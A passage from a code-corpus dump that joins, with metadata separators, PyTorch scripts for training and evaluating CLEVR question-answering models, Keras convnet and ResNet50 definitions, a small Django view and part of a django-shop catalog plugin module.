run_single_example(args, model)
else:
vocab = load_vocab(args)
loader_kwargs = {
'question_h5': args.input_question_h5,
'feature_h5': args.input_features_h5,
'vocab': vocab,
'batch_size': args.batch_size,
}
if args.num_samples is not None and args.num_samples > 0:
loader_kwargs['max_samples'] = args.num_samples
if args.family_split_file is not None:
with open(args.family_split_file, 'r') as f:
loader_kwargs['question_families'] = json.load(f)
with ClevrDataLoader(**loader_kwargs) as loader:
run_batch(args, model, loader)
def load_vocab(args):
path = None
if args.baseline_model is not None:
path = args.baseline_model
elif args.program_generator is not None:
path = args.program_generator
elif args.execution_engine is not None:
path = args.execution_engine
return utils.load_cpu(path)['vocab']
def run_single_example(args, model):
dtype = torch.FloatTensor
if args.use_gpu == 1:
dtype = torch.cuda.FloatTensor
# Build the CNN to use for feature extraction
print('Loading CNN for feature extraction')
cnn = build_cnn(args, dtype)
# Load and preprocess the image
img_size = (args.image_height, args.image_width)
# img = imread(args.image, mode='RGB')
img = cv2.imread(args.image)
# img = imresize(img, img_size, interp='bicubic')
img = cv2.resize(img, img_size, interpolation=cv2.INTER_CUBIC)
img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
img = img.transpose(2, 0, 1)[None]
mean = np.array([0.485, 0.456, 0.406]).reshape(1, 3, 1, 1)
std = np.array([0.229, 0.224, 0.224]).reshape(1, 3, 1, 1)
img = (img.astype(np.float32) / 255.0 - mean) / std
# Use CNN to extract features for the image
img_var = Variable(torch.FloatTensor(img).type(dtype))
img_var.requires_grad = False
feats_var = cnn(img_var)
# Tokenize the question
vocab = load_vocab(args)
question_tokens = tokenize(args.question,
punct_to_keep=[';', ','],
punct_to_remove=['?', '.'])
question_encoded = encode(question_tokens,
vocab['question_token_to_idx'],
allow_unk=True)
question_encoded = torch.LongTensor(question_encoded).view(1, -1)
question_encoded = question_encoded.type(dtype).long()
question_var = Variable(question_encoded)
question_var.requires_grad = False
# Run the model
print('Running the model\n')
scores = None
predicted_program = None
if type(model) is tuple:
program_generator, execution_engine = model
program_generator.type(dtype)
execution_engine.type(dtype)
predicted_program = program_generator.reinforce_sample(
question_var,
temperature=args.temperature,
argmax=(args.sample_argmax == 1))
scores = execution_engine(feats_var, predicted_program)
else:
model.type(dtype)
scores = model(question_var, feats_var)
# Print results
_, predicted_answer_idx = scores.data.cpu()[0].max(dim=0)
predicted_answer = vocab['answer_idx_to_token'][predicted_answer_idx.item()]
print('Question: "%s"' % args.question)
print('Predicted answer: ', predicted_answer)
if predicted_program is not None:
print()
print('Predicted program:')
program = predicted_program.data.cpu()[0]
num_inputs = 1
for fn_idx in program:
fn_str = vocab['program_idx_to_token'][fn_idx.item()]
num_inputs += iep.programs.get_num_inputs(fn_str) - 1
print(fn_str)
if num_inputs == 0:
break
def build_cnn(args, dtype):
if not hasattr(torchvision.models, args.cnn_model):
raise ValueError('Invalid model "%s"' % args.cnn_model)
if not 'resnet' in args.cnn_model:
raise ValueError('Feature extraction only supports ResNets')
whole_cnn = getattr(torchvision.models, args.cnn_model)(pretrained=True)
layers = [
whole_cnn.conv1,
whole_cnn.bn1,
whole_cnn.relu,
whole_cnn.maxpool,
]
for i in range(args.cnn_model_stage):
name = 'layer%d' % (i + 1)
layers.append(getattr(whole_cnn, name))
cnn = torch.nn.Sequential(*layers)
cnn.type(dtype)
cnn.eval()
return cnn
def run_batch(args, model, loader):
dtype = torch.FloatTensor
if args.use_gpu == 1:
dtype = torch.cuda.FloatTensor
if type(model) is tuple:
program_generator, execution_engine = model
run_our_model_batch(args, program_generator, execution_engine, loader, dtype)
else:
run_baseline_batch(args, model, loader, dtype)
def run_baseline_batch(args, model, loader, dtype):
model.type(dtype)
model.eval()
all_scores, all_probs = [], []
num_correct, num_samples = 0, 0
for batch in loader:
questions, images, feats, answers, programs, program_lists = batch
questions_var = Variable(questions.type(dtype).long(), volatile=True)
feats_var = Variable(feats.type(dtype), volatile=True)
scores = model(questions_var, feats_var)
probs = F.softmax(scores)
_, preds = scores.data.cpu().max(1)
all_scores.append(scores.data.cpu().clone())
all_probs.append(probs.data.cpu().clone())
num_correct += (preds == answers).sum()
num_samples += preds.size(0)
print('Ran %d samples' % num_samples)
acc = float(num_correct) / num_samples
print('Got %d / %d = %.2f correct' % (num_correct, num_samples, 100 * acc))
all_scores = torch.cat(all_scores, 0)
all_probs = torch.cat(all_probs, 0)
if args.output_h5 is not None:
print('Writing output to %s' % args.output_h5)
with h5py.File(args.output_h5, 'w') as fout:
fout.create_dataset('scores', data=all_scores.numpy())
fout.create_dataset('probs', data=all_probs.numpy())
def run_our_model_batch(args, program_generator, execution_engine, loader, dtype):
program_generator.type(dtype)
program_generator.eval()
execution_engine.type(dtype)
execution_engine.eval()
all_scores, all_programs = [], []
all_probs = []
num_correct, num_samples = 0, 0
for batch in loader:
questions, images, feats, answers, programs, program_lists = batch
questions_var = Variable(questions.type(dtype).long(), volatile=True)
feats_var = Variable(feats.type(dtype), volatile=True)
programs_pred = program_generator.reinforce_sample(
questions_var,
temperature=args.temperature,
argmax=(args.sample_argmax == 1))
if args.use_gt_programs == 1:
scores = execution_engine(feats_var, program_lists)
else:
scores = execution_engine(feats_var, programs_pred)
probs = F.softmax(scores)
_, preds = scores.data.cpu().max(1)
all_programs.append(programs_pred.data.cpu().clone())
all_scores.append(scores.data.cpu().clone())
all_probs.append(probs.data.cpu().clone())
num_correct += (preds == answers).sum()
num_samples += preds.size(0)
print('Ran %d samples' % num_samples)
acc = float(num_correct) / num_samples
print('Got %d / %d = %.2f correct' % (num_correct, num_samples, 100 * acc))
all_scores = torch.cat(all_scores, 0)
all_probs = torch.cat(all_probs, 0)
all_programs = torch.cat(all_programs, 0)
if args.output_h5 is not None:
print('Writing output to "%s"' % args.output_h5)
with h5py.File(args.output_h5, 'w') as fout:
fout.create_dataset('scores', data=all_scores.numpy())
fout.create_dataset('probs', data=all_probs.numpy())
fout.create_dataset('predicted_programs', data=all_programs.numpy())
if __name__ == '__main__':
args = parser.parse_args()
main(args)
```
#### File: clevr-iep/scripts/train_model.py
```python
import sys
import os
import argparse
import json
import random
import shutil
import torch
torch.backends.cudnn.enabled = True
from torch.autograd import Variable
import torch.nn.functional as F
import numpy as np
import h5py
import iep.utils as utils
import iep.preprocess
from iep.data import ClevrDataset, ClevrDataLoader
from iep.models import ModuleNet, Seq2Seq, LstmModel, CnnLstmModel, CnnLstmSaModel
parser = argparse.ArgumentParser()
# Input data
parser.add_argument('--train_question_h5', default='data/train_questions.h5')
parser.add_argument('--train_features_h5', default='data/train_features.h5')
parser.add_argument('--val_question_h5', default='data/val_questions.h5')
parser.add_argument('--val_features_h5', default='data/val_features.h5')
parser.add_argument('--feature_dim', default='1024,14,14')
parser.add_argument('--vocab_json', default='data/vocab.json')
parser.add_argument('--loader_num_workers', type=int, default=1)
parser.add_argument('--use_local_copies', default=0, type=int)
parser.add_argument('--cleanup_local_copies', default=1, type=int)
parser.add_argument('--family_split_file', default=None)
parser.add_argument('--num_train_samples', default=None, type=int)
parser.add_argument('--num_val_samples', default=10000, type=int)
parser.add_argument('--shuffle_train_data', default=1, type=int)
# What type of model to use and which parts to train
parser.add_argument('--model_type', default='PG',
choices=['PG', 'EE', 'PG+EE', 'LSTM', 'CNN+LSTM', 'CNN+LSTM+SA'])
parser.add_argument('--train_program_generator', default=1, type=int)
parser.add_argument('--train_execution_engine', default=1, type=int)
parser.add_argument('--baseline_train_only_rnn', default=0, type=int)
# Start from an existing checkpoint
parser.add_argument('--program_generator_start_from', default=None)
parser.add_argument('--execution_engine_start_from', default=None)
parser.add_argument('--baseline_start_from', default=None)
# RNN options
parser.add_argument('--rnn_wordvec_dim', default=300, type=int)
parser.add_argument('--rnn_hidden_dim', default=256, type=int)
parser.add_argument('--rnn_num_layers', default=2, type=int)
parser.add_argument('--rnn_dropout', default=0, type=float)
# Module net options
parser.add_argument('--module_stem_num_layers', default=2, type=int)
parser.add_argument('--module_stem_batchnorm', default=0, type=int)
parser.add_argument('--module_dim', default=128, type=int)
parser.add_argument('--module_residual', default=1, type=int)
parser.add_argument('--module_batchnorm', default=0, type=int)
# CNN options (for baselines)
parser.add_argument('--cnn_res_block_dim', default=128, type=int)
parser.add_argument('--cnn_num_res_blocks', default=0, type=int)
parser.add_argument('--cnn_proj_dim', default=512, type=int)
parser.add_argument('--cnn_pooling', default='maxpool2',
choices=['none', 'maxpool2'])
# Stacked-Attention options
parser.add_argument('--stacked_attn_dim', default=512, type=int)
parser.add_argument('--num_stacked_attn', default=2, type=int)
# Classifier options
parser.add_argument('--classifier_proj_dim', default=512, type=int)
parser.add_argument('--classifier_downsample', default='maxpool2',
choices=['maxpool2', 'maxpool4', 'none'])
parser.add_argument('--classifier_fc_dims', default='1024')
parser.add_argument('--classifier_batchnorm', default=0, type=int)
parser.add_argument('--classifier_dropout', default=0, type=float)
# Optimization options
parser.add_argument('--batch_size', default=64, type=int)
parser.add_argument('--num_iterations', default=100000, type=int)
parser.add_argument('--learning_rate', default=5e-4, type=float)
parser.add_argument('--reward_decay', default=0.9, type=float)
# Output options
parser.add_argument('--checkpoint_path', default='data/checkpoint.pt')
parser.add_argument('--randomize_checkpoint_path', type=int, default=0)
parser.add_argument('--record_loss_every', type=int, default=1)
parser.add_argument('--checkpoint_every', default=10000, type=int)
def main(args):
if args.randomize_checkpoint_path == 1:
name, ext = os.path.splitext(args.checkpoint_path)
num = random.randint(1, 1000000)
args.checkpoint_path = '%s_%06d%s' % (name, num, ext)
vocab = utils.load_vocab(args.vocab_json)
if args.use_local_copies == 1:
shutil.copy(args.train_question_h5, '/tmp/train_questions.h5')
shutil.copy(args.train_features_h5, '/tmp/train_features.h5')
shutil.copy(args.val_question_h5, '/tmp/val_questions.h5')
shutil.copy(args.val_features_h5, '/tmp/val_features.h5')
args.train_question_h5 = '/tmp/train_questions.h5'
args.train_features_h5 = '/tmp/train_features.h5'
args.val_question_h5 = '/tmp/val_questions.h5'
args.val_features_h5 = '/tmp/val_features.h5'
question_families = None
if args.family_split_file is not None:
with open(args.family_split_file, 'r') as f:
question_families = json.load(f)
train_loader_kwargs = {
'question_h5': args.train_question_h5,
'feature_h5': args.train_features_h5,
'vocab': vocab,
'batch_size': args.batch_size,
'shuffle': args.shuffle_train_data == 1,
'question_families': question_families,
'max_samples': args.num_train_samples,
'num_workers': args.loader_num_workers,
}
val_loader_kwargs = {
'question_h5': args.val_question_h5,
'feature_h5': args.val_features_h5,
'vocab': vocab,
'batch_size': args.batch_size,
'question_families': question_families,
'max_samples': args.num_val_samples,
'num_workers': args.loader_num_workers,
}
with ClevrDataLoader(**train_loader_kwargs) as train_loader, \
ClevrDataLoader(**val_loader_kwargs) as val_loader:
train_loop(args, train_loader, val_loader)
if args.use_local_copies == 1 and args.cleanup_local_copies == 1:
os.remove('/tmp/train_questions.h5')
os.remove('/tmp/train_features.h5')
os.remove('/tmp/val_questions.h5')
os.remove('/tmp/val_features.h5')
def train_loop(args, train_loader, val_loader):
vocab = utils.load_vocab(args.vocab_json)
program_generator, pg_kwargs, pg_optimizer = None, None, None
execution_engine, ee_kwargs, ee_optimizer = None, None, None
baseline_model, baseline_kwargs, baseline_optimizer = None, None, None
baseline_type = None
pg_best_state, ee_best_state, baseline_best_state = None, None, None
# Set up model
if args.model_type == 'PG' or args.model_type == 'PG+EE':
program_generator, pg_kwargs = get_program_generator(args)
pg_optimizer = torch.optim.Adam(program_generator.parameters(),
lr=args.learning_rate)
print('Here is the program generator:')
print(program_generator)
if args.model_type == 'EE' or args.model_type == 'PG+EE':
execution_engine, ee_kwargs = get_execution_engine(args)
ee_optimizer = torch.optim.Adam(execution_engine.parameters(),
lr=args.learning_rate)
print('Here is the execution engine:')
print(execution_engine)
if args.model_type in ['LSTM', 'CNN+LSTM', 'CNN+LSTM+SA']:
baseline_model, baseline_kwargs = get_baseline_model(args)
params = baseline_model.parameters()
if args.baseline_train_only_rnn == 1:
params = baseline_model.rnn.parameters()
baseline_optimizer = torch.optim.Adam(params, lr=args.learning_rate)
print('Here is the baseline model')
print(baseline_model)
baseline_type = args.model_type
loss_fn = torch.nn.CrossEntropyLoss().cuda()
stats = {
'train_losses': [], 'train_rewards': [], 'train_losses_ts': [],
'train_accs': [], 'val_accs': [], 'val_accs_ts': [],
'best_val_acc': -1, 'model_t': 0,
}
t, epoch, reward_moving_average = 0, 0, 0
set_mode('train', [program_generator, execution_engine, baseline_model])
print('train_loader has %d samples' % len(train_loader.dataset))
print('val_loader has %d samples' % len(val_loader.dataset))
while t < args.num_iterations:
epoch += 1
print('Starting epoch %d' % epoch)
for batch in train_loader:
t += 1
questions, _, feats, answers, programs, _ = batch
questions_var = Variable(questions.cuda())
feats_var = Variable(feats.cuda())
answers_var = Variable(answers.cuda())
if programs[0] is not None:
programs_var = Variable(programs.cuda())
reward = None
if args.model_type == 'PG':
# Train program generator with ground-truth programs
pg_optimizer.zero_grad()
loss = program_generator(questions_var, programs_var)
loss.backward()
pg_optimizer.step()
elif args.model_type == 'EE':
# Train execution engine with ground-truth programs
ee_optimizer.zero_grad()
scores = execution_engine(feats_var, programs_var)
loss = loss_fn(scores, answers_var)
loss.backward()
ee_optimizer.step()
elif args.model_type in ['LSTM', 'CNN+LSTM', 'CNN+LSTM+SA']:
baseline_optimizer.zero_grad()
baseline_model.zero_grad()
scores = baseline_model(questions_var, feats_var)
loss = loss_fn(scores, answers_var)
loss.backward()
baseline_optimizer.step()
elif args.model_type == 'PG+EE':
programs_pred = program_generator.reinforce_sample(questions_var)
scores = execution_engine(feats_var, programs_pred)
loss = loss_fn(scores, answers_var)
_, preds = scores.data.cpu().max(1)
raw_reward = (preds == answers).float()
reward_moving_average *= args.reward_decay
reward_moving_average += (1.0 - args.reward_decay) * raw_reward.mean()
centered_reward = raw_reward - reward_moving_average
if args.train_execution_engine == 1:
ee_optimizer.zero_grad()
loss.backward()
ee_optimizer.step()
if args.train_program_generator == 1:
pg_optimizer.zero_grad()
program_generator.reinforce_backward(centered_reward.cuda())
pg_optimizer.step()
if t % args.record_loss_every == 0:
print(t, loss.data[0])
stats['train_losses'].append(loss.data[0])
stats['train_losses_ts'].append(t)
if reward is not None:
stats['train_rewards'].append(reward)
if t % args.checkpoint_every == 0:
print('Checking training accuracy ... ')
train_acc = check_accuracy(args, program_generator, execution_engine,
baseline_model, train_loader)
print('train accuracy is', train_acc)
print('Checking validation accuracy ...')
val_acc = check_accuracy(args, program_generator, execution_engine,
baseline_model, val_loader)
print('val accuracy is ', val_acc)
stats['train_accs'].append(train_acc)
stats['val_accs'].append(val_acc)
stats['val_accs_ts'].append(t)
if val_acc > stats['best_val_acc']:
stats['best_val_acc'] = val_acc
stats['model_t'] = t
best_pg_state = get_state(program_generator)
best_ee_state = get_state(execution_engine)
best_baseline_state = get_state(baseline_model)
checkpoint = {
'args': args.__dict__,
'program_generator_kwargs': pg_kwargs,
'program_generator_state': best_pg_state,
'execution_engine_kwargs': ee_kwargs,
'execution_engine_state': best_ee_state,
'baseline_kwargs': baseline_kwargs,
'baseline_state': best_baseline_state,
'baseline_type': baseline_type,
'vocab': vocab
}
for k, v in stats.items():
checkpoint[k] = v
print('Saving checkpoint to %s' % args.checkpoint_path)
torch.save(checkpoint, args.checkpoint_path)
del checkpoint['program_generator_state']
del checkpoint['execution_engine_state']
del checkpoint['baseline_state']
with open(args.checkpoint_path + '.json', 'w') as f:
json.dump(checkpoint, f)
if t == args.num_iterations:
break
def parse_int_list(s):
return tuple(int(n) for n in s.split(','))
def get_state(m):
if m is None:
return None
state = {}
for k, v in m.state_dict().items():
state[k] = v.clone()
return state
def get_program_generator(args):
vocab = utils.load_vocab(args.vocab_json)
if args.program_generator_start_from is not None:
pg, kwargs = utils.load_program_generator(args.program_generator_start_from)
cur_vocab_size = pg.encoder_embed.weight.size(0)
if cur_vocab_size != len(vocab['question_token_to_idx']):
print('Expanding vocabulary of program generator')
pg.expand_encoder_vocab(vocab['question_token_to_idx'])
kwargs['encoder_vocab_size'] = len(vocab['question_token_to_idx'])
else:
kwargs = {
'encoder_vocab_size': len(vocab['question_token_to_idx']),
'decoder_vocab_size': len(vocab['program_token_to_idx']),
'wordvec_dim': args.rnn_wordvec_dim,
'hidden_dim': args.rnn_hidden_dim,
'rnn_num_layers': args.rnn_num_layers,
'rnn_dropout': args.rnn_dropout,
}
pg = Seq2Seq(**kwargs)
pg.cuda()
pg.train()
return pg, kwargs
def get_execution_engine(args):
vocab = utils.load_vocab(args.vocab_json)
if args.execution_engine_start_from is not None:
ee, kwargs = utils.load_execution_engine(args.execution_engine_start_from)
# TODO: Adjust vocab?
else:
kwargs = {
'vocab': vocab,
'feature_dim': parse_int_list(args.feature_dim),
'stem_batchnorm': args.module_stem_batchnorm == 1,
'stem_num_layers': args.module_stem_num_layers,
'module_dim': args.module_dim,
'module_residual': args.module_residual == 1,
'module_batchnorm': args.module_batchnorm == 1,
'classifier_proj_dim': args.classifier_proj_dim,
'classifier_downsample': args.classifier_downsample,
'classifier_fc_layers': parse_int_list(args.classifier_fc_dims),
'classifier_batchnorm': args.classifier_batchnorm == 1,
'classifier_dropout': args.classifier_dropout,
}
ee = ModuleNet(**kwargs)
ee.cuda()
ee.train()
return ee, kwargs
def get_baseline_model(args):
vocab = utils.load_vocab(args.vocab_json)
if args.baseline_start_from is not None:
model, kwargs = utils.load_baseline(args.baseline_start_from)
elif args.model_type == 'LSTM':
kwargs = {
'vocab': vocab,
'rnn_wordvec_dim': args.rnn_wordvec_dim,
'rnn_dim': args.rnn_hidden_dim,
'rnn_num_layers': args.rnn_num_layers,
'rnn_dropout': args.rnn_dropout,
'fc_dims': parse_int_list(args.classifier_fc_dims),
'fc_use_batchnorm': args.classifier_batchnorm == 1,
'fc_dropout': args.classifier_dropout,
}
model = LstmModel(**kwargs)
elif args.model_type == 'CNN+LSTM':
kwargs = {
'vocab': vocab,
'rnn_wordvec_dim': args.rnn_wordvec_dim,
'rnn_dim': args.rnn_hidden_dim,
'rnn_num_layers': args.rnn_num_layers,
'rnn_dropout': args.rnn_dropout,
'cnn_feat_dim': parse_int_list(args.feature_dim),
'cnn_num_res_blocks': args.cnn_num_res_blocks,
'cnn_res_block_dim': args.cnn_res_block_dim,
'cnn_proj_dim': args.cnn_proj_dim,
'cnn_pooling': args.cnn_pooling,
'fc_dims': parse_int_list(args.classifier_fc_dims),
'fc_use_batchnorm': args.classifier_batchnorm == 1,
'fc_dropout': args.classifier_dropout,
}
model = CnnLstmModel(**kwargs)
elif args.model_type == 'CNN+LSTM+SA':
kwargs = {
'vocab': vocab,
'rnn_wordvec_dim': args.rnn_wordvec_dim,
'rnn_dim': args.rnn_hidden_dim,
'rnn_num_layers': args.rnn_num_layers,
'rnn_dropout': args.rnn_dropout,
'cnn_feat_dim': parse_int_list(args.feature_dim),
'stacked_attn_dim': args.stacked_attn_dim,
'num_stacked_attn': args.num_stacked_attn,
'fc_dims': parse_int_list(args.classifier_fc_dims),
'fc_use_batchnorm': args.classifier_batchnorm == 1,
'fc_dropout': args.classifier_dropout,
}
model = CnnLstmSaModel(**kwargs)
if model.rnn.token_to_idx != vocab['question_token_to_idx']:
# Make sure new vocab is superset of old
for k, v in model.rnn.token_to_idx.items():
assert k in vocab['question_token_to_idx']
assert vocab['question_token_to_idx'][k] == v
for token, idx in vocab['question_token_to_idx'].items():
model.rnn.token_to_idx[token] = idx
kwargs['vocab'] = vocab
model.rnn.expand_vocab(vocab['question_token_to_idx'])
model.cuda()
model.train()
return model, kwargs
def set_mode(mode, models):
assert mode in ['train', 'eval']
for m in models:
if m is None: continue
if mode == 'train': m.train()
if mode == 'eval': m.eval()
def check_accuracy(args, program_generator, execution_engine, baseline_model, loader):
set_mode('eval', [program_generator, execution_engine, baseline_model])
num_correct, num_samples = 0, 0
for batch in loader:
questions, _, feats, answers, programs, _ = batch
questions_var = Variable(questions.cuda(), volatile=True)
feats_var = Variable(feats.cuda(), volatile=True)
answers_var = Variable(feats.cuda(), volatile=True)
if programs[0] is not None:
programs_var = Variable(programs.cuda(), volatile=True)
scores = None # Use this for everything but PG
if args.model_type == 'PG':
vocab = utils.load_vocab(args.vocab_json)
for i in range(questions.size(0)):
program_pred = program_generator.sample(Variable(questions[i:i+1].cuda(), volatile=True))
program_pred_str = iep.preprocess.decode(program_pred, vocab['program_idx_to_token'])
program_str = iep.preprocess.decode(programs[i], vocab['program_idx_to_token'])
if program_pred_str == program_str:
num_correct += 1
num_samples += 1
elif args.model_type == 'EE':
scores = execution_engine(feats_var, programs_var)
elif args.model_type == 'PG+EE':
programs_pred = program_generator.reinforce_sample(
questions_var, argmax=True)
scores = execution_engine(feats_var, programs_pred)
elif args.model_type in ['LSTM', 'CNN+LSTM', 'CNN+LSTM+SA']:
scores = baseline_model(questions_var, feats_var)
if scores is not None:
_, preds = scores.data.cpu().max(1)
num_correct += (preds == answers).sum()
num_samples += preds.size(0)
if num_samples >= args.num_val_samples:
break
set_mode('train', [program_generator, execution_engine, baseline_model])
acc = float(num_correct) / num_samples
return acc
if __name__ == '__main__':
args = parser.parse_args()
main(args)
``` |
{
"source": "2000222/S4L-Semi-supervised-learning",
"score": 3
} |
#### File: S4L-Semi-supervised-learning/networks/convnet.py
```python
from keras.models import Model
from keras.layers import Input, Conv2D, Dropout
from keras.layers import MaxPooling2D, LeakyReLU
from keras.layers import BatchNormalization
from keras.regularizers import l2
from keras import initializers
from keras import backend as K
seed_number = 1
# Non-linearity params
leakiness = 0.0
# Batchnorm params
mom = 0.99
eps = 0.001
gamma = 'ones'
# Convolution params
bias = True
weight_decay = 0.0005
initer = initializers.he_normal(seed=seed_number)
def create_model(input_shape, dropout=0.0):
channel_axis = 1 if K.image_data_format() == "channels_first" else -1
data = Input(shape=input_shape)
x = Conv2D(128, (3, 3), padding='same', kernel_initializer=initer,
kernel_regularizer=l2(weight_decay), use_bias=bias)(data)
x = BatchNormalization(axis=channel_axis, momentum=mom,
epsilon=eps, gamma_initializer=gamma)(x)
x = LeakyReLU(leakiness)(x)
x = Conv2D(128, (3, 3), padding='same', kernel_initializer=initer,
kernel_regularizer=l2(weight_decay), use_bias=bias)(x)
x = BatchNormalization(axis=channel_axis, momentum=mom,
epsilon=eps, gamma_initializer=gamma)(x)
x = LeakyReLU(leakiness)(x)
x = Conv2D(128, (3, 3), padding='same', kernel_initializer=initer,
kernel_regularizer=l2(weight_decay), use_bias=bias)(x)
x = BatchNormalization(axis=channel_axis, momentum=mom,
epsilon=eps, gamma_initializer=gamma)(x)
x = LeakyReLU(leakiness)(x)
x = MaxPooling2D((2, 2), padding='same')(x)
if dropout > 0.0: x = Dropout(dropout)(x)
x = Conv2D(256, (3, 3), padding='same', kernel_initializer=initer,
kernel_regularizer=l2(weight_decay), use_bias=bias)(x)
x = BatchNormalization(axis=channel_axis, momentum=mom,
epsilon=eps, gamma_initializer=gamma)(x)
x = LeakyReLU(leakiness)(x)
x = Conv2D(256, (3, 3), padding='same', kernel_initializer=initer,
kernel_regularizer=l2(weight_decay), use_bias=bias)(x)
x = BatchNormalization(axis=channel_axis, momentum=mom,
epsilon=eps, gamma_initializer=gamma)(x)
x = LeakyReLU(leakiness)(x)
x = Conv2D(256, (3, 3), padding='same', kernel_initializer=initer,
kernel_regularizer=l2(weight_decay), use_bias=bias)(x)
x = BatchNormalization(axis=channel_axis, momentum=mom,
epsilon=eps, gamma_initializer=gamma)(x)
x = LeakyReLU(leakiness)(x)
x = MaxPooling2D((2, 2), padding='same')(x)
if dropout > 0.0: x = Dropout(dropout)(x)
x = Conv2D(512, (3, 3), padding='valid', kernel_initializer=initer,
kernel_regularizer=l2(weight_decay), use_bias=bias)(x)
x = BatchNormalization(axis=channel_axis, momentum=mom,
epsilon=eps, gamma_initializer=gamma)(x)
x = LeakyReLU(leakiness)(x)
x = Conv2D(256, (1, 1), padding='valid', kernel_initializer=initer,
kernel_regularizer=l2(weight_decay), use_bias=bias)(x)
x = BatchNormalization(axis=channel_axis, momentum=mom,
epsilon=eps, gamma_initializer=gamma)(x)
x = LeakyReLU(leakiness)(x)
x = Conv2D(128, (1, 1), padding='valid', kernel_initializer=initer,
kernel_regularizer=l2(weight_decay), use_bias=bias)(x)
x = BatchNormalization(axis=channel_axis, momentum=mom,
epsilon=eps, gamma_initializer=gamma)(x)
x = LeakyReLU(leakiness)(x)
# Return output dimensions 6 x 6 x 128
model = Model(data, x, name='convnet_trunk')
return model
```
#### File: S4L-Semi-supervised-learning/networks/resnet50v2.py
```python
import keras
from keras.models import Model
from keras.layers import Input, Conv2D, Dropout
from keras.layers import MaxPooling2D, LeakyReLU
from keras.layers import BatchNormalization
from keras.regularizers import l2
from keras import initializers
from keras import backend as K
from keras.layers import GlobalAveragePooling2D
from keras import applications
from keras.applications.resnet50 import ResNet50
seed_number = 1
# Non-linearity params
leakiness = 0.0
# Batchnorm params
mom = 0.99
eps = 0.001
gamma = 'ones'
# Convolution params
bias = False
weight_decay = 0.0005
initer = initializers.he_normal(seed=seed_number)
def create_model(input_shape):
#load the model
#module=hub.module("https://tfhub.dev/google/imagenet/resnet_v2_50/feature_vector/3")
channel_axis = 1 if K.image_data_format() == "channels_first" else -1
input_tensor = Input(shape=input_shape)
base_model = ResNet50(include_top=False,
weights='imagenet',
input_tensor=input_tensor)
#base_model.load_weights('/content/resnet50_weights_tf_dim_ordering_tf_kernels_notop.h5')
x = base_model.output
x = BatchNormalization(axis=channel_axis, momentum=mom,
epsilon=eps, gamma_initializer=gamma)(x)
x = LeakyReLU(leakiness)(x)
model = Model(input_tensor,x,name = 'resnet50_trunk')
return model
``` |
{
"source": "2000charge/ap-python-sdk",
"score": 2
} |
#### File: app/views/home.py
```python
from django.http import HttpResponse
from django.template import loader
def index(request):
template = loader.get_template('home/index.html')
return HttpResponse(template.render({}, request))
``` |
{
"source": "2000-ion/TIDPP-Lab3",
"score": 2
} |
#### File: shop/cascade/catalog.py
```python
from django.contrib.admin import StackedInline
from django.forms import fields, widgets
from django.template.loader import select_template
from django.utils.translation import gettext_lazy as _, gettext
from entangled.forms import EntangledModelFormMixin, EntangledModelForm
from cms.plugin_pool import plugin_pool
from cms.utils.compat.dj import is_installed
from cmsplugin_cascade.mixins import WithSortableInlineElementsMixin
from cmsplugin_cascade.models import SortableInlineCascadeElement
from shop.cascade.plugin_base import ShopPluginBase, ProductSelectField
from shop.conf import app_settings
from shop.models.product import ProductModel
if is_installed('adminsortable2'):
from adminsortable2.admin import SortableInlineAdminMixin
else:
SortableInlineAdminMixin = type('SortableInlineAdminMixin', (object,), {})
class ShopCatalogPluginForm(EntangledModelFormMixin):
CHOICES = [
('paginator', _("Use Paginator")),
('manual', _("Manual Infinite")),
('auto', _("Auto Infinite")),
]
pagination = fields.ChoiceField(
choices=CHOICES,
widget=widgets.RadioSelect,
label=_("Pagination"),
initial='paginator',
help_text=_("Shall the product list view use a paginator or scroll infinitely?"),
)
class Meta:
entangled_fields = {'glossary': ['pagination']}
class ShopCatalogPlugin(ShopPluginBase):
name = _("Catalog List View")
require_parent = True
form = ShopCatalogPluginForm
parent_classes = ['BootstrapColumnPlugin', 'SimpleWrapperPlugin']
cache = False
def get_render_template(self, context, instance, placeholder):
templates = []
if instance.glossary.get('render_template'):
templates.append(instance.glossary['render_template'])
templates.extend([
'{}/catalog/list.html'.format(app_settings.APP_LABEL),
'shop/catalog/list.html',
])
return select_template(templates)
def render(self, context, instance, placeholder):
context['pagination'] = instance.glossary.get('pagination', 'paginator')
return context
@classmethod
def get_identifier(cls, obj):
pagination = obj.glossary.get('pagination')
if pagination == 'paginator':
return gettext("Manual Pagination")
return gettext("Infinite Scroll")
plugin_pool.register_plugin(ShopCatalogPlugin)
class ShopAddToCartPluginForm(EntangledModelFormMixin):
use_modal_dialog = fields.BooleanField(
label=_("Use Modal Dialog"),
initial=True,
required=False,
help_text=_("After adding product to cart, render a modal dialog"),
)
class Meta:
entangled_fields = {'glossary': ['use_modal_dialog']}
class ShopAddToCartPlugin(ShopPluginBase):
name = _("Add Product to Cart")
require_parent = True
form = ShopAddToCartPluginForm
parent_classes = ['BootstrapColumnPlugin']
cache = False
def get_render_template(self, context, instance, placeholder):
templates = []
if instance.glossary.get('render_template'):
templates.append(instance.glossary['render_template'])
if context['product'].managed_availability():
template_prefix = 'available-'
else:
template_prefix = ''
templates.extend([
'{}/catalog/{}product-add2cart.html'.format(app_settings.APP_LABEL, template_prefix),
'shop/catalog/{}product-add2cart.html'.format(template_prefix),
])
return select_template(templates)
def render(self, context, instance, placeholder):
context = super().render(context, instance, placeholder)
context['use_modal_dialog'] = bool(instance.glossary.get('use_modal_dialog', True))
return context
plugin_pool.register_plugin(ShopAddToCartPlugin)
class ProductGalleryForm(EntangledModelForm):
order = fields.IntegerField(
widget=widgets.HiddenInput,
initial=0,
)
product = ProductSelectField(
required=False,
label=_("Related Product"),
help_text=_("Choose related product"),
)
class Meta:
entangled_fields = {'glossary': ['product']}
untangled_fields = ['order']
class ProductGalleryInline(SortableInlineAdminMixin, StackedInline):
model = SortableInlineCascadeElement
form = ProductGalleryForm
extra = 5
ordering = ['order']
verbose_name = _("Product")
verbose_name_plural = _("Product Gallery")
class ShopProductGallery(WithSortableInlineElementsMixin, ShopPluginBase):
name = _("Product Gallery")
require_parent = True
parent_classes = ('BootstrapColumnPlugin',)
inlines = (ProductGalleryInline,)
# until this bug https://github.com/applegrew/django-select2/issues/65 is fixed
# we hide the a "add row" button and instead use `extra = 5` in ProductGalleryInline
class Media:
css = {'all': ('shop/css/admin/product-gallery.css',)}
def get_render_template(self, context, instance, placeholder):
templates = []
if instance.glossary.get('render_template'):
templates.append(instance.glossary['render_template'])
templates.extend([
'{}/catalog/product-gallery.html'.format(app_settings.APP_LABEL),
